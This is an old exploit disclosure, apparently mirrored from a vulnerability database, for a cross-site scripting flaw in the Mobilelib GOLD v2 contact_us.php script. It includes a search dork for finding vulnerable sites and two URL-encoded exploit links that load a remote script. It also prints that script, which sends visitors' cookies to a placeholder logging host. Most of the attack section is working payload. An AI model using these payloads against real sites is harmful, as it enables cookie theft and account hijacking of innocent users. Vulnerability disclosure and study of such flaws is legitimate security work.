Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15521
HistoryDec 30, 2006 - 12:00 a.m.

XSS in script Mobilelib GOLD v2

2006-12-3000:00:00
vulners.com
20

/////////////////////////////////////
// XSS in script Mobilelib GOLD v2 //
////////////////////////////////////
Found By: viP HaCKEr
Tame : AL-GaRNi
Vendor: http://www.ac4p.com
Software: Mobilelib GOLD GOLD v2
google : "Powered by ac4p.com"
::::::::::::::::::::::::::::::::::::::
Description:

Line 32 of contact_us.php
:::::::::::::::::::::::::::::::::::::
code:
}
$html=getthemeM("show.tpl");
$html=eregi_replace("{marquee}","$Newnews",$html);
include("block.php");
$errr='';
function chek_mail($email)
{
::::::::::::::::::::::::::::::::::::::
Exploits :

http://[target]/[path]/contact_us.php?email=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E #

//and

http://[target]/[path]/contact_us.php?errr=%20%22%3E%3Cscript%20src%3Dhttp%3A//www.xxxx.com/swt.js%3E%3C/script%3E #
/****************************************************************//
//Content swt.js
location.href='http://www.yoursite.com/log.php?swt='+escape(document.cookie); #

//End swt.js
############### Group AL-GaRNi ##################
/**********************************************#
/*SwEET-DeViL & viP HaCkEr & HaCkEr sUn *#
/********************************************#
#################(c)@2006####################
########## [email protected] #############
########## [email protected] ##########
##########################################